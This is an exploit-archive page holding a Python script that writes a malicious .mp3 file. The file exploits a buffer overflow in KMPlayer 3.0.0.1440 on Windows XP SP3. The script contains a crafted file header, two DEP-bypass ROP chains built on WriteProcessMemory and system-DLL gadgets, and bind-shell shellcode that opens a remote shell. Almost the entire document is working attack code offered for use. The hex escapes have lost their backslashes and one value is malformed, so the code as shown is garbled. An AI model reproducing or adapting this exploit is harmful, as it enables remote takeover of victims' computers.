Home / exploitsPDF  

KMPlayer 3.0.0.1440 Buffer Overflow

Posted on 07 June 2011

#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.

import os

evilfile = "km_pwn.mp3"

head = "x77x44x37x03x00x00x00x00x1Fx76x54x49x54x32x00x00x13x16x00x00x00xD6x6Dx61x73x68x69x6Ex67x20x54x68x65x20x4Fx70x70xFAx6Ex52xCCx74x86x41x4Cx42x00x00x00x15x00x00x00xE7x65xE1x65x6Ex64x20x4Fx66x20x54x68x65x20x42x6Cx61x63x6Bx20xE3x68x61x77xEFx72x6Dx61x54x52x13x4Bx70x00x00x3Ex00x00x00x34x8CxA5x45x52x73x00x00x05x00x00xD2x32xDCx30x39x54x43x4Fx4Ex00x00x00x0Cx00x00x00x1Ax50x79x63x16x65x64x65x6Cx69x9Bx65x60x69x4Dx81x00x00x3Cx00x32x00xECx6Ex67xCDx55x50x45x54x45x4Ex43x63x00x00xEBx00x00x70x4Cx61x6Dx65x20x33x2Ex7Ax37x54x4Cx41x4Ex00x96x00x08x00x00x00x45x79x67x6Fx69x73x68x50x7Cx49x56x00x99xDBx29x00x00x57x4Dx3Cx4Dx54xDBx69x61x43x6Cx61x73x85x53x65xDBx6FxE1x64x61x72x79x68x44xF6x00x00x00x00x00x00x00x00x00x00xAEx00x00x00x00x00x50x52x49xCFx00x00xE6x27x00x00x57x4Dx2Fx4Dx65xE6x69x61x43x6Cx61x73x73x50x32x69xC0x61x72x79xC0x44x00xBCx51x4Dx30x23xE3xE2x4Bx86xA1x48xA2xB0x28x44x1Ex50x52x49x56x00x00x00xAAx0Bx00x57x9Ax2Fx50x72x6Fx1Ex69x50xA1x72x00xC3x00x4Dx00x47x79x00x00x50x52x49x56x00x00x00x1Fx00x00x57x6Cx2Fx57x4Dx4Ex6Fx6Ex74x65x6ExF7x49x44x00x03x6Ax21x12x66x52x4Dx49x93x83xD6x39xB3x6Ex1Ax76xA6x52x49x56xC2x20x00x57x00x00xA2x4Dx2Fx57x59x43x25x6Cx6Cx65x0Cx74xE2x8Ex6Ex1Fx44x01xECx4BxF3xABxEBx1CxD1x4CxBFx29x8Fx8DxC3x7DxA2x74x50x52x49xC3x00x4Ex00x27x83x00x57x4Dx2Fx57x4Dx43x6Fx6Cx6CxC6x63x74x69x6Fx6Ex47x72x6Fx75x70x49x44x00xECxFAxF3xABxECx1CxD1x4Cx90x22x8Fx8DxC3x06xA2x0Fx54x50x55x42x00x00x38x08x00x50x00x48x59xEEx6Dx65x67x61x50x1Fx49x56x00x00x00x23x00x00x57x4Dx2Fx9Bx6ExB4x71x75xE0x46x69x6Cx65x49x64x65x6Ex74x69x66x69x65xEBx00x41x00x4Dx00x47x00x61x00x0Bx00x69x00x64x00x3Dx00x52x00x20x00x20x00x31x00x17x00x37x00x32x00x34x00x37x00x34xFDxB5x00x55x00x4Dx00x47xCEx70x62x5FxABx69x2Fx64x00x3Dx00x50x00x20x00x20x00x20xA6x34x00x37x6Cx35x0Ex32x00x39x00x30x00xCExBBx41x00x2Ax00x47x00x74x80x5Fx00x71x00x64x00x3Dx00x3Ex04x7Cx00x31x00x37x00x36x00xBCx00x31x00xA7xC0x32x8Ex33x00x00x00x54x50x45x32x00x7Cx50x12x00x17xAEx49x6Ex66x5ExCBx74x65xACx20x4Dx75x73x68x72x6Fx6Fx6Dx54x43x4Fx4Dx40x00x00x23x00x00xA0xCBx6Dx69x74x64xD0x10x75x76x49x65x76x9FxCBx96x75x76x1Ex65x76x61x6Ex69x2Fx45x72xBCx7Ax20x45x69xB5x65x6Ex54x50xF8x31x00x00x00x25x00x00x47x49x6Ex66x65x63x74x65x64x20x4Dx75x1Ex68x72x6Fx6Dx6Fx56x20x20x73x4Ax20x6Ex6Fx9Cx61x61x68x20x6Ex61x7Ex69x76x00xDBx00x00x00x00x00x00x00x00x00x82x00x24x00x00x00x00x00x00x00x75x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xA2x00x00x9Dx00x00x00x00x7FxEBx79x82x00x75x00x00x00xDFx00x00x00x00x00x93x00x00x00x00xF4x00x00x00x00x00x00x00x00x00x00x00x00x52x00x00xCAx00x00x00x00xE5x00x00xEAxAFx00xFEx00x00x00x00x00x00x00x00x00x4Dx00x00x00x00x00x00x15x00xB3x00x00x00xC4x50x00x00x20x00x00x00x00x00x00x00x00xEAx00x00x00x00x66x00x00x00x00x00x00x00x00x00x00x00x00x78x00x00x2Fx00x10x00x00x00x00x00xC8x00x00x00x00x00x00x00x00xE4x00x00x00x00x00x2Cx7Ex00x00x00x00x00x00x56x00x00x00x00x00x00x6Fx00x00xECx00x00x00x40x00x83x57x00x88x00x00x00x11x00x81x00x00x00x00xBCx00x00x00x00"

cruft = "x85" * 3162
nops = "x90" * 28
nops += "x91x90x90x90"      # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += "x90" * 20

#shellcode = "xcc" * 368       # Size of bind shell

#root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b 'x00x0ax0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("xbdxcfxd8x7cxd0xddxc1xd9x74x24xf4x58x2bxc9xb1"
"x56x31x68x13x83xc0x04x03x68xc0x3ax89x2cx36x33"
"x72xcdxc6x24xfax28xf7x76x98x39xa5x46xeax6cx45"
"x2cxbex84xdex40x17xaax57xeex41x85x68xdex4dx49"
"xaax40x32x90xfexa2x0bx5bxf3xa3x4cx86xfbxf6x05"
"xccxa9xe6x22x90x71x06xe5x9exc9x70x80x61xbdxca"
"x8bxb1x6dx40xc3x29x06x0exf4x48xcbx4cxc8x03x60"
"xa6xbax95xa0xf6x43xa4x8cx55x7ax08x01xa7xbaxaf"
"xf9xd2xb0xd3x84xe4x02xa9x52x60x97x09x11xd2x73"
"xabxf6x85xf0xa7xb3xc2x5fxa4x42x06xd4xd0xcfxa9"
"x3bx51x8bx8dx9fx39x48xafx86xe7x3fxd0xd9x40xe0"
"x74x91x63xf5x0fxf8xebx3ax22x03xecx54x35x70xde"
"xfbxedx1ex52x74x28xd8x95xafx8cx76x68x4fxedx5f"
"xafx1bxbdxf7x06x23x56x08xa6xf6xf9x58x08xa8xb9"
"x08xe8x18x52x43xe7x47x42x6cx2dxfex44xa2x15x53"
"x23xc7xa9x42xefx4ex4fx0ex1fx07xc7xa6xddx7cxd0"
"x51x1dx57x4cxcax89xefx9axccxb6xefx88x7fx1ax47"
"x5bx0bx70x5cx7ax0cx5dxf4xf5x35x36x8ex6bxf4xa6"
"x8fxa1x6ex4ax1dx2ex6ex05x3exf9x39x42xf0xf0xaf"
"x7exabxaaxcdx82x2dx94x55x59x8ex1bx54x2cxaax3f"
"x46xe8x33x04x32xa4x65xd2xecx02xdcx94x46xddxb3"
"x7ex0ex98xffx40x48xa5xd5x36xb4x14x80x0excbx99"
"x44x87xb4xc7xf4x68x6fx4cx04x23x2dxe5x8dxeaxa4"
"xb7xd3x0cx13xfbxedx8ex91x84x09x8exd0x81x56x08"
"x09xf8xc7xfdx2dxafxe8xd7")

##################### ROP Chain for VMware Workstation (Linux) and Xen #####################

eip = "x71x14x40x00"        # 00401471   RETN   Pivot to the stack
toesp = "x42" * 4
wpm = "x13x22x80x7c"        # 7C802213 WriteProcessMemory - XPSP3
wpm += "x20x1fx45x02"       # 02451F20 in_wm.dll - Return after WPM
wpm += "xffxffxffxff"       # hProcess
wpm += "x10x1fx45x02"       # 02451F10 in_wm.dll - Address to Patch
wpm += "xbexbaxfexca"       # lpBuffer placeholder (Shellcode Address)
wpm += "xcexfaxedxfe"       # nSize placeholder (Shellcode Size)
wpm += "xc0x2bx45x02"       # 02452BC0 in_wm.dll - Pointer for Written Bytes

# Get a copy of ESP into a register
rop1 = "x4fx92x71x13"       # 1371924F :  {POP}  # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += "x41" * 12             # Junk to be popped into ESI, EBP, and EBX
junk = "x61" * 52              # Junk in between our VirtualProtect parameters and the next ROP chain

# Put a copy of the saved ESP from EDI into EAX
rop2 = "x75x66x8ax5b"       # 5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "x41" * 8              # Compensate for the RETN 8 in rop1
# Increase EAX to point at our shellcode
rop2 += "x37x75x37x02"      # 02377537 :  # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += "x37x75x37x02"      # 02377537 :  # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder
# First need to put EAX in a safe spot then juggle around EDI to get it to ESI
rop2 += "xc3x87xecx76"      # 76EC87C3 :  # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "x75x66x8ax5b"      # 5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "xd8xc3x3cx76"      # 763CC3D8 :  # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += "xc3x87xecx76"      # 76EC87C3 :  # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "xbex9cxcax76"      # 76CA9CBE :  # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += "x41" * 4              # Junk to be popped into ESI

# Get the intial ESP value back into ESI
rop2 += "xe6x57x01x15"      #150157E6 :  {POP}  # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += "x41" * 8              # Junk to be popped into EBX and ECX

# Get the initial ESP value back into ESI
rop2 += "xd8xc3x3cx76"      # 763CC3D8 :  # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += "xc0x11x37x02"      # 023711C0 :  # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += "xe9x0bx44x02"      # 02440BE9 :  # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "x41" * 4              # Junk to be popped into EBP
rop2 += "xe9x0bx44x02"      # 02440BE9 :  # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "x41" * 4              # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += "x3fxcfx9ex7c"      # 7C9ECF3F :  {POP}  # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += "x41" * 8              # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += "x41x15x5dx77"      # 775D1541 :  # SUB EAX,4 # RETN (ole32.dll)
rop2 += "x41" * 4
rop2 += "x51xebx43x02"      # 0243EB51 :  # ADD EAX,0C # RETN (in_wm.dll)
rop2 += "xcex05x42x02"      # 024205CE :  {POP}  # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += "x41" * 4              # Junk to be popped into ESI

rop2 += "x41" * 32

############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
#put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
jmp_value = "xf0x38x00x00"
rop_1 = "x46"*4
#0x7744802C :  # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)  **
rop_1 += "x2cx80x44x77"
#0x5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)  **
rop_1 += "x75x66x8ax5b"
#0x7C926021 :  {POP}  # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)  **
rop_1 += "x21x60x92x7c"
rop_1 += "x50" * 8
#0x7E451509 :  # XCHG EAX,ESP # RETN   (USER32.dll)  **
rop_1 += "x09x15x45x7e"
###############################################################################################


filler_a1 = "x41"*360


###############################################################################################
## ROP_2 = all about the shell
###############################################################################################

######### SAVING STACKPOINTERS ################################################################
#0x7744802C :  # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)  **
rop_2 = "x2cx80x44x77"
#0x5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)  **
rop_2 += "x75x66x8ax5b"
#0x5B8A9F1E :  # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)  **
rop_2 += "x1ex9fx8ax5b"
rop_2 += "x43x43x43x43"

#WriteProcessMemory construct with the two placeholders we need to generate on the fly
###############################################################################################
rop_2 += "x13x22x80x7c" #WriteProcMem - XPSP3
rop_2 += "x00x2ex98x7c" #ntdll - patching target
rop_2 += "xffxffxffxff"     #hProcess
rop_2 += "x00x2ex98x7c"     #ntdll - patching target
rop_2 += "xbexbaxfexca"     #lpBuffer placeholder (Shellcode Address)
rop_2 += "xcexfaxedxfe"     #lpBuffer placeholder (Shellcode Size)
rop_2 += "10x20x98x7c"      #writeable location in ntdll
###############################################################################################

######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
#gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
#then we write the value to the correct memory address and restore EAX
rop_2 += "x44" * 40
#0x7C974E8E :  # ADD EAX,100 # POP EBP # RETN  (ntdll.dll)  **
rop_2 += "x8ex4ex97x7c"
rop_2 += "x44" *32
rop_2 += "x8ex4ex97x7c"
rop_2 += "x44"*4
#0x7E45DA8D :  # XCHG EAX,EBP # RETN   (USER32.dll)  **
rop_2 += "x8dxdax45x7e"
#0x77DD994E :  # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)  **
rop_2 += "x4ex99xddx77"
#0x7C910C66 :  # XCHG EAX,ESI # RETN 2 (ntdll.dll)  **
rop_2 += "x66x0cx91x7c"
#padding
rop_2 += "x44" * 2
#0x7E45DA8D :  # XCHG EAX,EBP # RETN   (USER32.dll)  **
rop_2 += "x8dxdax45x7e"
#padding
rop_2 += "x44"*2
#0x76CA9CBE :  # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN  (IMAGEHLP.dll)  **
rop_2 += "xbex9cxcax76"
###############################################################################################


######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
#gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
#then we write the value to the correct memory address and restore EAX
rop_2 += "x47" *4
#0x775D156E :  # PUSH EAX # POP ESI # RETN (ole32.dll)  **
rop_2 += "x6ex15x5dx77"
#0x7E433785 :  # XOR EAX,EAX # RETN 4  (USER32.dll)  **
rop_2 += "x85x37x43x7e"
#0x7C974E8E :  # ADD EAX,100 # POP EBP # RETN  (ntdll.dll)  **
rop_2 += "x8ex4ex97x7c"
rop_2 += "x45"*8
rop_2 += "x8ex4ex97x7c"
rop_2 += "x45"*4
#0x75D0AA2E :  # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN  (mlang.dll)  **
rop_2 += "x2exaaxd0x75"
###############################################################################################

###############################################################################################
######### Realigning EAX to point to WPM and setting ESP to it ################################
rop_2 += "x50" * 4
#0x76CAF118 :  # ADD EAX,0C # RETN (IMAGEHLP.dll)  **
rop_2 += "x18xf1xcax76"
#0x7E451509 :  # XCHG EAX,ESP # RETN   (USER32.dll)  **
rop_2 += "x09x15x45x7e"
rop_2 += "x43"*316
###############################################################################################

##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
#slide into the shell
nops_7 = "x90"*56
#after the shell junk
filler_a2 = "x42" * (3200)
###############################################################################################

############################# PUTTING IT TOGETHER #############################################
filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
#small buffer filler
filler_b = "x44" * (95)
#the whole shebang (ronin's version)
filler = filler_a+jmp_value+eip+rop_1+filler_b
###############################################################################################



sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler

crashy = open(evilfile,"w")
crashy.write(sploit)
crashy.close()

 

TOP

Malware :

Exploits :